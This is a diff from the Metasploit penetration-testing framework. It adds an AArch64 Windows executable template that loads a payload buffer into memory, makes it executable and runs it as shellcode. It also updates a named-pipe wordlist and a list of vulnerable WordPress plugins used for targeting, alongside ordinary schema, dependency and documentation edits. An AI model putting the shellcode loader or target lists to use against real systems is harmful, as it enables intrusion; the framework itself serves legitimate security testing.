+payload_buffer
+        DCB     "PAYLOAD:"
+        SPACE   SCSIZE - 8 ; Reserve the rest of the 4096 bytes
+
+        END
@@ -0,0 +1,69 @@
+// AArch64 PE EXE Template for Metasploit Framework
+//
+// -----------------------------------------------------------------------------
+//
+// Compilation Instructions:
+//
+//   Using MSVC on a Windows ARM64 Host:
+//
+//   cl.exe /nologo /O2 /W3 /GS- /D_WIN64 template_aarch64_windows.c /link ^
+//   /subsystem:windows /machine:arm64 /entry:main ^
+//   /out:template_aarch64_windows.exe kernel32.lib
+//
+// -----------------------------------------------------------------------------
+
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+#undef WIN32_LEAN_AND_MEAN
+
+#define PAYLOAD_MARKER "PAYLOAD:"
+#define SCSIZE 8192
+
+char payload[SCSIZE] = PAYLOAD_MARKER;
+
+int main(void)
+{
+    void *exec_mem;
+    DWORD old_prot;
+    HANDLE hThread;
+
+    // Stage 1: Allocate a block of memory. We request READWRITE permissions
+    // initially so we can copy our payload into it.
+    exec_mem = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (exec_mem == NULL)
+    {
+        // Fail silently if allocation fails.
+        return 1;
+    }
+
+    // Stage 2: Copy the payload from our data section into the new memory block.
+    // A simple loop is used for maximum compiler compatibility and to avoid
+    // needing extra headers like <string.h> for memcpy.
+    for (int i = 0; i < SCSIZE; i++)
+    {
+        ((char *)exec_mem)[i] = payload[i];
+    }
+
+    // Stage 3: Change the memory's protection flags from READWRITE to
+    // EXECUTE_READ.
+    if (VirtualProtect(exec_mem, SCSIZE, PAGE_EXECUTE_READ, &old_prot) == FALSE)
+    {
+        // Fail silently if we cannot make the memory executable.
+        return 1;
+    }
+
+    // Stage 4: Execute the shellcode.
+    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);
+    if (hThread)
+    {
+        WaitForSingleObject(hThread, INFINITE);
+        CloseHandle(hThread);
+    }
+    else
+    {
+        // As a fallback in case CreateThread fails, call the shellcode directly.
+        ((void (*)())exec_mem)();
+    }
+
+    return 0;
+}
@@ -23,3 +23,4 @@ W32TIME_ALT
 wkssvc
 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
 db2remotecmd
+CxUIUSvcChannel
@@ -1,71 +1,73 @@
-wordpress-popular-posts
-backup
-catch-themes-demo-import
-modern-events-calendar-lite
-ninja-forms
-simple-file-list
-sp-client-document-manager
-drag-and-drop-multiple-file-upload-contact-form-7
-wp-file-manager
-duplicator
-work-the-flow-file-upload
 ajax-load-more
-wpdiscuz
-wptouch
-front-end-editor
-wpshop
-plainview-activity-monitor
-sexy-contact-form
+all-in-one-wp-migration
+backup
+backup-backup
+boldgrid-backup
+bookingpress
+bulletproof-security
+catch-themes-demo-import
+chopslider
+custom-registration-form-builder-with-submission-manager
+depicter
 download-manager
+drag-and-drop-multiple-file-upload-contact-form-7
+dukapress
+duplicator
+duplicator_download
+easy-wp-smtp
+elementor
+email-subscribers
+file-manager-advanced-shortcode
+front-end-editor
+gi-media-library
+give
+hash-form
 inboundio-marketing
-wp-mobile-detector
-website-contact-form-with-file-upload
-slideshow-gallery
-reflex-gallery
-wp-symposium
+learnpress
+loginizer
+masterstudy-lms-learning-management-system
+modern-events-calendar-lite
+nextgen-gallery
+ninja-forms
+paid-memberships-pro
+perfect-survey
 photo-gallery
 pie-register
-wysija-newsletters
-dzs-zoomsounds
-all-in-one-wp-migration
-wp-ultimate-csv-importer
-wp-symposium
-masterstudy-lms-learning-management-system
-wp-gdpr-compliance
-wp-automatic
-wp-easycart
-dukapress
-loginizer
-email-subscribers
-wps-hide-login
-secure-copy-content-protection
-wordpress-mobile-pack
-learnpress
-wp-mobile-edition
-boldgrid-backup
-modern-events-calendar-lite
-gi-media-library
-chopslider
-bulletproof-security
-nextgen-gallery
-simple-backup
-subscribe-to-comments
-easy-wp-smtp
-duplicator_download
-custom-registration-form-builder-with-submission-manager
-woocommerce-abandoned-cart
-elementor
-bookingpress
-paid-memberships-pro
-woocommerce-payments
-file-manager-advanced-shortcode
-royal-elementor-addons
-backup-backup
-hash-form
-give
-ultimate-member
-wp-fastest-cache
+plainview-activity-monitor
 post-smtp
 really-simple-ssl
-perfect-survey
+reflex-gallery
+royal-elementor-addons
+secure-copy-content-protection
+sexy-contact-form
+simple-backup
+simple-file-list
+slideshow-gallery
+sp-client-document-manager
+subscribe-to-comments
+suretriggers
+tatsu
+ultimate-member
+user-registration
+user-registration-pro
+website-contact-form-with-file-upload
+woocommerce-abandoned-cart
+woocommerce-payments
+wordpress-mobile-pack
+wordpress-popular-posts
+work-the-flow-file-upload
+wp-automatic
+wpdiscuz
+wp-easycart
+wp-fastest-cache
+wp-file-manager
+wp-gdpr-compliance
+wp-mobile-detector
+wp-mobile-edition
+wps-hide-login
+wpshop
+wp-symposium
 wp-time-capsule
+wptouch
+wp-ultimate-csv-importer
+wysija-newsletters
@@ -1,3 +1,3 @@
+bricks
 holding_pattern
 wplms
-bricks
@@ -10,7 +10,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema[7.0].define(version: 2022_12_09_005658) do
+ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"

@@ -314,6 +314,7 @@ ActiveRecord::Schema[7.0].define(version: 2022_12_09_005658) do
    t.datetime "created_at", precision: nil, null: false
    t.datetime "updated_at", precision: nil, null: false
    t.string "jtr_format"
+    t.jsonb "metadata", default: {}, null: false
    t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_pkcs12", unique: true, where: "((type)::text = 'Metasploit::Credential::Pkcs12'::text)"
    t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)"
    t.index ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT (((type)::text = 'Metasploit::Credential::SSHKey'::text) OR ((type)::text = 'Metasploit::Credential::Pkcs12'::text)))"
@@ -802,5 +803,4 @@ ActiveRecord::Schema[7.0].define(version: 2022_12_09_005658) do
    t.boolean "limit_to_network", default: false, null: false
    t.boolean "import_fingerprint", default: false
  end
-
 end
@@ -17,15 +17,15 @@ GEM
    byebug (11.1.3)
    coderay (1.1.3)
    colorator (1.1.0)
-    concurrent-ruby (1.3.4)
+    concurrent-ruby (1.3.5)
    em-websocket (0.5.3)
      eventmachine (>= 0.12.9)
      http_parser.rb (~> 0)
    eventmachine (1.2.7)
-    ffi (1.17.0)
+    ffi (1.17.1)
    forwardable-extended (2.6.0)
    http_parser.rb (0.8.0)
-    i18n (1.14.6)
+    i18n (1.14.7)
      concurrent-ruby (~> 1.0)
    jekyll (4.3.4)
      addressable (~> 2.4)
@@ -76,7 +76,7 @@ GEM
    rb-fsevent (0.11.2)
    rb-inotify (0.11.1)
      ffi (~> 1.0)
-    rexml (3.3.9)
+    rexml (3.4.1)
    rouge (4.5.1)
    safe_yaml (1.0.5)
    sassc (2.4.0)
@@ -1 +1 @@
-Metasploit Documentation
+<img src="{{ '/assets/images/metasploit-logo-dark-external-use.svg' | relative_url }}" alt="Metasploit Logo" class="title-logo" />
@@ -17,7 +17,7 @@ module Rouge
    SHORTNAME = 'z'

    token :Msf, SHORTNAME do
-      # prompt - msf / msf5 / msf6 / meterpreter
+      # prompt - msf / meterpreter
      token :Prompt, "#{SHORTNAME}p"
      # [-]
      token :Error, "#{SHORTNAME}e"
@@ -49,7 +49,7 @@ module Rouge
      state :root do
        mixin :whitespace

-        # Match msf, msf5, msf6, meterpreter
+        # Match msf, meterpreter
        rule %r{^(msf\d?|meterpreter)}, Tokens::Msf::Prompt, :msf_prompt
        rule %r{^\[-\]}, Tokens::Msf::Error
        rule %r{^\[\+\]}, Tokens::Msf::Good
@@ -59,7 +59,7 @@ module Rouge
      end

      # State for highlighting the prompt such as
-      # msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >
+      # msf auxiliary(admin/dcerpc/cve_2022_26923_certifried) >
      state :msf_prompt do
        mixin :whitespace

@@ -5,6 +5,11 @@
    text-align: justify;
 }

+/* Site logo */
+.title-logo {
+    width: 220px;
+}
+
 /* Color highlighting for msf console text */
 .language-mermaid .label {
    text-transform: inherit;
@@ -146,7 +146,7 @@ register_options(
  ], self.class)
 ```

-**8. Neglecting to use send_request_cgi()'s vars_get or vars_get when crafting a POST/GET request**
+**8. Neglecting to use send_request_cgi()'s vars_post or vars_get when crafting a POST/GET request**

 ```ruby
 data_post = 'user=jsmith&pass=hello123'
@@ -199,4 +199,4 @@ Metasploit3.new
 ```ruby
 # https://github.com/rapid7/metasploit-framework/issues/3853
 datastore['BAD'] = 'This is bad.'
-```
+```
@@ -85,7 +85,7 @@ Additionally any information about caveats, scenarios you have tested, custom op
 should also go into this file.

 ## Checking Documentation Syntax
-Once you have written the documentation, you then want to run `toos/dev/msftidy_docs.rb <path to documentation file>`. This will report on any
+Once you have written the documentation, you then want to run `tools/dev/msftidy_docs.rb <path to documentation file>`. This will report on any
 errors with your documentation file, which you will want to fix before submitting your PR. Notice however that if you get a warning about long lines,
 these may be okay to ignore depending on the context. A good example is if a line is long merely because of a URL. Such warnings can be
 safely ignored.
@@ -10,28 +10,38 @@ Updates are released about once every other week for Windows and Linux.

 The pgp signatures below can be verified with the following [public key](https://pgp.mit.edu/pks/lookup?op=get&search=0xCDFB5FA52007B954)

-|Download Link|File Type|SHA1|PGP|
-|-|-|-|-|
-| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.asc)|
-| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.asc)|
-| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.asc)|
-| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)|
-| [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc)|
-| [metasploit-4.20.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.asc)|
-| [metasploit-4.19.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.asc)|
-| [metasploit-4.19.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run.asc)|
-| [metasploit-4.19.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe.asc)|
-| [metasploit-4.19.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run.asc)|
-| [metasploit-4.18.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe.asc)|
-| [metasploit-4.18.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run.asc)|
-| [metasploit-4.17.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe.asc)|
-| [metasploit-4.17.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run.asc)|
+| Download Link                                                                                                                                                |File Type| SHA                                                                                                                       | PGP                                                                                                                      |
+|--------------------------------------------------------------------------------------------------------------------------------------------------------------|-|---------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------|
+| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
+| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.6-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.6-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.5-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.5-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.4-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.4-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.4-2024101401-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.3-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.3-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.3-2024082201-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.2-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.2-2024072501-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.asc)   |
+| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc) |
+| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.asc)   |
+| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc) |
+| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)   |
+| [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc) |
+| [metasploit-4.20.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.asc)   |
+| [metasploit-4.19.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.asc) |
+| [metasploit-4.19.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-linux-x64-installer.run.asc)   |
+| [metasploit-4.19.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-windows-x64-installer.exe.asc) |
+| [metasploit-4.19.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.0-2021031701-linux-x64-installer.run.asc)   |
+| [metasploit-4.18.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-windows-x64-installer.exe.asc) |
+| [metasploit-4.18.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.18.0-2020101201-linux-x64-installer.run.asc)   |
+| [metasploit-4.17.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-windows-x64-installer.exe.asc) |
